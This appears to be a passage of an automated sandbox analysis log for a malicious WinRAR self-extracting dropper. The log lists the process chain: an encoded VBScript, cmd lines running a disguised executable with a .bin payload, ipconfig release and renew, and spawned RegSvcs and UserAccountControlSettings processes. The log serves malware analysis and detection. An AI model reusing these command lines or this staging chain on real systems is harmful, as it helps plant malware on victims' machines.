                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0025EBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0025EBD3
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2552:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:336:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3656
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCommand line argument: 0T)0_2_0026454A
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCommand line argument: sfxname0_2_0026454A
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCommand line argument: sfxstime0_2_0026454A
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCommand line argument: STARTDLG0_2_0026454A
                Source: FX6KTgnipP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeFile read: C:\Windows\win.iniJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: FX6KTgnipP.exeReversingLabs: Detection: 71%
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeFile read: C:\Users\user\Desktop\FX6KTgnipP.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\FX6KTgnipP.exe "C:\Users\user\Desktop\FX6KTgnipP.exe"
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.bin
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 dmqiuorkt.mp2 tdggoffi.bin
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\SysWOW64\UserAccountControlSettings.exe "C:\Windows\SysWOW64\UserAccountControlSettings.exe"
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 196
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.binJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 dmqiuorkt.mp2 tdggoffi.binJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\SysWOW64\UserAccountControlSettings.exe "C:\Windows\SysWOW64\UserAccountControlSettings.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: dxgidebug.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Section loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Section loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Section loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Section loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Section loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Section loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Section loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Section loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Section loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Section loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Section loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Section loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Section loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exeSection loaded: wininet.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: FX6KTgnipP.exeStatic file information: File size 1330396 > 1048576
                Source: FX6KTgnipP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: FX6KTgnipP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: FX6KTgnipP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: FX6KTgnipP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: FX6KTgnipP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: FX6KTgnipP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: FX6KTgnipP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: FX6KTgnipP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: FX6KTgnipP.exe
                Source: Binary string: UserAccountControlSettings.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.2206467110.0000000001538000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2166226808.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2165340743.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: UserAccountControlSettings.pdb source: RegSvcs.exe, 0000000E.00000002.2206467110.0000000001538000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2166226808.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2165340743.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.2206645455.0000000001990000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004960000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2261587798.00000000047B4000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2223900833.0000000004608000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.2206645455.0000000001990000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004960000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2261587798.00000000047B4000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2223900833.0000000004608000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
                Source: FX6KTgnipP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: FX6KTgnipP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: FX6KTgnipP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: FX6KTgnipP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: FX6KTgnipP.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_00855D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,7_2_00855D78
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_5925140Jump to behavior
                Source: FX6KTgnipP.exeStatic PE information: section name: .didat
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00266680 push ecx; ret 0_2_00266693
